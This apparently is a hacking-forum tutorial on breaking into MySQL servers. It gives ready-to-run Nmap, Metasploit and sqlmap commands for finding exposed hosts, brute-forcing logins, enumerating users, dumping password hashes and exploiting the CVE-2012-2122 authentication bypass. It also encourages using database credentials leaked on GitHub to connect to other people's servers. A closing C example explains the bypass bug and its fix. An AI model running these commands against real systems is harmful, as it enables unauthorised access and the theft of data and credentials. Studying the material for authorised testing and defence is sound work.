Methods and tools for hacking MySQL databases. | HackTube | Crax

Instead of a preface
Let's start with a definition. MySQL is a relational database management system that supports several storage engines, such as MyISAM, InnoDB and Archive. Like most open-source projects, it has forks, such as MariaDB. By way of preface, I should note that most of the vectors, techniques and bugs discussed here apply to the various engines and forks, although not always.

WWW
Different versions of MySQL for different platforms can be found here.

Finding Targets
But let's get straight to the point. To attack someone, we first need to find them. Let's assume we already know who our target is, know their IP, or are on the same local network. We need to scan their address (or network) for open ports. By default MySQL listens on port 3306, so that is what we look for. Every hacker should have the Nmap scanner in their arsenal; it finds services and open ports on target machines. An example scan command looks like this:

nmap -sV -Pn -p <port> <ip>
-Pn is a very useful option: it tells Nmap to skip the host discovery stage and go straight to port scanning. This matters when the machine does not answer ping probes but still has open ports; without this flag Nmap would skip the host;
-sV probes the open ports to identify the service and its version.
For UDP scanning, add the -sU flag.

nmap -sV -Pn -p 3306 172.16.2.114
Nmap scan report for 172.16.2.114
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL (unauthorized)


SHODAN
If you don't have a specific target and want to test your skills, you can use the hacker search engine Shodan. It allows you to search for hosts and output information about various services based on banner responses. It also has the ability to filter by ports, country, city, operating systems, and so on. One of the coolest features is searching for services with anonymous authentication or authentication with standard credentials. It's a very useful service, but it's best to conduct vulnerability testing on your local resources :).


GitHub
One of the easiest routes to a database is searching the source code of projects on GitHub. Before hunting for and exploiting SQL injection on a website, which can take quite a long time (if any injection is present at all), it is enough to go to the beloved collaborative development site, type in a few words, and with some luck obtain the source code. For some unclear reason many developers publish their projects openly: maybe out of foolishness, maybe because they do not want to pay for a private repository, or maybe because they want to share their great code with the whole world. Whatever the reason, there is a huge pile of source code on GitHub, from small sites to large projects, and this often simplifies the work. For example, the search query username mysql password database returns a staggering number of results, and especially many PHP files in which the database connection is written out in full.


Therefore, the first thing we do in a pentest is check GitHub for the client's source code. If something turns up, you can connect to the database with confidence and then, depending on the privileges, extract the data you need. But if we could not find the coveted username/password lines, don't despair: we can dig through the site's source code, if it is available, and audit the service not blindly but with its source in front of us. That greatly simplifies finding vulnerabilities: instead of probing blindly, we check specific vectors derived from the code. For example, look at where the database is accessed, whether input from the client is filtered, and so on.

Tools
There are different ways to search for injections: automatically or manually inserting quotes everywhere (fuzzing), or using the GitHub trick, relying on the carelessness of the developers of the service under investigation. And finally the moment of truth arrives: we have found our long-awaited injection and are ready to get fully inside. But there is a problem: we have urgent matters (friends invite us for a beer), or we are overcome by terrible, insurmountable laziness. Don't worry, an excellent tool, sqlmap, comes to the rescue. It automates the search for and exploitation of SQL injections: it does not just find the hole, it fully exploits it, and it supports all types of injection. sqlmap lets you dump databases, search within a database automatically, extract and crack logins and passwords, run a command shell, and run an interactive SQL shell in which you simply write SQL queries and sqlmap builds the injection payload itself. There is an excellent cheat sheet that shows all the capabilities of this tool in two pages.

There are a few more tools that will come in handy in the difficult task of conquering MySQL. They don't need much introduction, as you've probably heard about them many times before. The first is Metasploit, one of the key hacking programs that allows you to create exploits and debug them. The second is the Nmap scanner, which has also been written about in the magazine many times.

There is an abundance of information on all of the listed tools, so we will not delve into the details of their use. If you haven't used them yet, you should definitely do so, and Google and official sites will help you with this. Let's move on.

Information gathering
You need to start with the simplest thing: gathering information. In Metasploit this is done with auxiliary/scanner/mysql/mysql_version, a plain version scanner that can sweep a whole pool of addresses:

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_version) > exploit
There is also an Nmap script that connects to the server and prints various useful information: protocol, version number, status, and salt.

nmap -sV -sC <target>

Bruteforce
One of the things that has to be done most often is, of course, brute forcing: checking for weak or default user passwords. But before you start guessing passwords, you can run a user enumeration attack. This works against 5.x servers that support the old authentication mechanisms (CVE-2012-5615). After the scan we know which users exist in the database, which significantly narrows the pool of usernames to brute force.

nmap --script mysql-enum <target>
Having compiled our pool of usernames and passwords, we proceed to bruteforcing:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set USER_FILE /root/login/logins
msf auxiliary(mysql_login) > set PASS_FILE /root/login/password
msf auxiliary(mysql_login) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_login) > exploit
Nmap uses built-in lists of passwords and users, but you can always supply your own:

nmap --script mysql-brute <target>
--script-args userdb=<path> - use your own username list
--script-args passdb=<path> - use your own password list
By the way, here is an excellent repository where you can find the most popular logins, passwords, and more. Usually, another simple but quite important check is performed during brute forcing: an empty password for the root or anonymous user:

nmap -sV --script=mysql-empty-password <target>

Post-exploitation
The next important step after obtaining a login/password (via injection or brute force) is post-exploitation. I will list the various Nmap modules and their purpose. So, the module that lists databases:

nmap -sV --script mysql-databases <target>
The module that lists users:

nmap -sV --script mysql-users <target>
The module that lists server variables:

nmap -sV --script mysql-variables <target>
The module that dumps users and their password hashes in a format convenient for cracking:

nmap -p 3306 <ip> --script mysql-dump-hashes --script-args='username=root,password=secret'
msf > use auxiliary/admin/mysql/mysql_hashdump
The module that acts as a MySQL client and sends queries to the remote database:

nmap -p 3306 <ip> --script mysql-query --script-args='query="<query>"[,username=<username>,password=<password>]'
msf > use auxiliary/admin/mysql/mysql_sql

Scanning for CVE-2012-2122
It is worth mentioning separately one interesting module that is present in both Metasploit and Nmap: the check for CVE-2012-2122. This vulnerability allows remote users to bypass authentication because the result of the password comparison is checked improperly. With a probability of 1/256 a login with an incorrect password succeeds, because MySQL wrongly treats the token received from the client and the expected value as equal. Using a known username (for example root, which is almost always present) with any password, you can connect to the database by repeating the connection about 300 times. After that you can dump all user password hashes, crack them, and connect with a legitimate password. But not everything is as good as it seems: only builds where the memcmp() function returns values outside the range -128 to 127 are vulnerable, so this is a relatively limited set of systems:

Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04);
OpenSuSE 12.1 64-bit MySQL 5.5.23-log;
Debian Unstable 64-bit 5.5.23-2;
Fedora;
Arch Linux.
But if there is even the slightest possibility of getting into the database, it is worth trying:

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > exploit
For Nmap, when scanning, you need to use the mysql-vuln-cve2012-2122 script:

nmap -sV --script mysql-vuln-cve2012-2122 <target>
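The defect class behind CVE-2012-2122, as an added C illustration (not code from the post or from MySQL): a constructed stand-in for an optimised memcmp that returns a full-width word difference, the vulnerable and patched shapes of the scramble check modelled on the public fix, and an exhaustive count that reproduces the 1/256 acceptance rate quoted above. The function names and the 20-byte token length are assumptions taken from the public description of the fix.

```c
#include <stdint.h>
#include <stdio.h>
#define TOKEN_LEN 20   /* SHA1_HASH_SIZE: length of the token compared at login */
typedef char my_bool;  /* MySQL's my_bool was a plain char: the root of the bug */

/* Constructed stand-in for an optimised libc memcmp: like the word-at-a-time SSE
 * builds on the affected 64-bit platforms it returns the full-width difference of
 * the first differing little-endian 4-byte word, not just -1/0/1. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n) {
    for (size_t i = 0; i + 4 <= n; i += 4) {
        uint32_t wa = 0, wb = 0;
        for (int k = 3; k >= 0; k--) {
            wa = (wa << 8) | a[i + k];
            wb = (wb << 8) | b[i + k];
        }
        if (wa != wb)
            return (int32_t)(wa - wb);  /* may lie far outside -128..127 */
    }
    return 0;
}

/* Vulnerable shape of check_scramble(): the int from memcmp is returned through a
 * char-sized my_bool, so a nonzero result whose low byte is 0 is narrowed to 0 ("OK"). */
static my_bool check_scramble_vulnerable(const unsigned char *got, const unsigned char *expected) {
    return (my_bool) wide_memcmp(got, expected, TOKEN_LEN);
}
/* Patched shape: normalise to 0/1 before the value is narrowed to my_bool. */
static my_bool check_scramble_fixed(const unsigned char *got, const unsigned char *expected) {
    return wide_memcmp(got, expected, TOKEN_LEN) != 0;
}

/* Try every token differing from an all-zero expected token in its first two bytes
 * (65536 candidates, one of them correct) and count how many each check accepts:
 * 256 of 65536 for the vulnerable check is the 1/256 quoted above. */
static int accepted_count(my_bool (*check)(const unsigned char *, const unsigned char *)) {
    unsigned char expected[TOKEN_LEN] = {0}, got[TOKEN_LEN] = {0};
    int accepted = 0;
    for (int v = 0; v < 65536; v++) {
        got[0] = (unsigned char)(v & 0xff);
        got[1] = (unsigned char)(v >> 8);
        if (check(got, expected) == 0)
            accepted++;
    }
    return accepted;
}
int main(void) {
    printf("vulnerable: %d/65536 accepted, fixed: %d/65536 accepted\n",
           accepted_count(check_scramble_vulnerable), accepted_count(check_scramble_fixed));
    return 0;
}
```

The same narrowing happens with any comparison result that is passed through a one-byte type, which is why the patch normalises to 0/1 rather than relying on memcmp returning small values.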
 